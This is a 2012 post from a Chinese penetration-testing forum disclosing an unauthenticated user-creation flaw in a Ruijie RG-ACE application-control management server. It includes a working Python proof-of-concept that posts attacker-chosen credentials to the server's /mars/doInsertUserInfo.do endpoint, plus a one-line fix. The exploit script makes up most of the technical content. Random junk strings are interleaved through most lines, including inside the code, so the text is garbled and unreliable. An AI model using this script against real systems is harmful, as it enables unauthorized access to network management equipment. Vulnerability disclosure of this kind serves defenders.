找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2075|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
6 U6 s& d, K' I; w- i
& q1 q9 w; k0 B; @! }) Z. f9 {& z0 }- W, ~% h
测试的具体版本是5 @& x  S# e2 i  D7 |% R( H
产品名称: 锐捷应用控制引擎6 n* E9 X- |' U' n; M
版本号: 3.1.36.001 TC  N9 Q; B: r/ L! V1 @3 s
编译时间: 201104291730
% K* }& ~4 J0 W* w7 \ * [5 X% R; k6 s  O& Z. N& j) A4 P

- l, |( o2 A+ W( E# h漏洞证明:6 \2 x8 d6 L, h2 m! F+ f

& R/ J- p/ n, T: p* o9 I* S; e  u7 Z1 ]7 J7 z' F3 g4 B

! l8 x8 `: x9 e; ~7 S6 C( z' k1 g( ~- ^8 m) Y9 U; z3 @
. X/ L7 P# B: f( W  T) m7 y( g
$ c& Y! z$ M) ~1 x2 H
执行脚本
- Z) ]" ], N0 z4 ~- @#! /usr/bin/env python# C' d2 D$ \! C* H5 s+ P0 O; r
#coding=gbk
3 b  ~! y/ t- ~8 P5 S& r#RG-ACE管理服务器 V3.1.36.001
. q7 \; }$ r+ f; B% k0 p  j- h1 Y( Ximport urllib2, urllib,cookielib
; r" Q# `- f$ durl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
! ]$ m8 k5 }% Q  F' P% D$ F( c! Eopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
7 S9 W7 i: [* F* E/ bopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]4 b9 t2 [3 {7 q
post=(("event","userManager.doInsertUserInfo"),0 ?% P* X: V) [( T  F" u
("useractionname","addButtonValue"),
* |! @( ^# ]0 c2 q* [("useropermanager","userManager"),; d$ ]  ~6 v1 o# P* v
("userName","t"), #######账号自己加
# L8 K% l" r3 |' z; O! W("pwd","aaaaaa"),######密码自己加# Q! ]! m+ S2 f) {2 [5 e4 ?
("trueName","ad"),+ M0 {; A$ m1 }4 h, P" i
("email",""),
, V9 }' G- c2 l8 q, A0 g2 h("mobilePhone",""),
6 D5 \+ A9 I* G3 Z5 F$ u- l("officePhone",""),+ ?- w4 z4 h$ [  j
("addr",""),& Z+ r1 E! E- T; x6 B1 N
("submit","确定"))
: t, `  }# z; a$ _$ Uurllib2.install_opener(opener)
: H# R8 `# L1 ?* J; ?* q' _! cp=urllib2.urlopen(url, urllib.urlencode(post)).read(). L9 l5 X' m" [/ b1 b
print "Done"+ u3 N' T2 B& l/ }+ m# p) ]1 \1 B

% k6 q, I5 R6 w$ `1 n/ k8 w; Z, {登录,连接设备
1 s9 c' I0 {$ Q) q" \' H5 M7 Q; z$ W  L& ]3 X! N
$ R0 Y/ d. n5 C) y9 C3 r0 r
4 B7 q8 w1 \  R3 n7 m7 C( O; x
3 d( r& W6 C, q2 O

- m0 g) _' t; O( d3 ^默认的管理员admin权限更大点( \/ R$ W( v5 h0 C9 x7 _) ]
! \. q% O& Q* F% l! H
4 W7 K) j( d4 t
: d6 @7 Z: \8 U" @$ r# r, S! T2 ~
! u4 u9 P# `; z* ]- v

3 p+ {: m6 F" u修复方案:
$ m4 I* B. Y" v1 a4 q加强对接口的权限验证
* F) J! ^! \4 K; x# P8 i  Z8 ~) O: f% p' W$ ^. N2 e5 ]
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表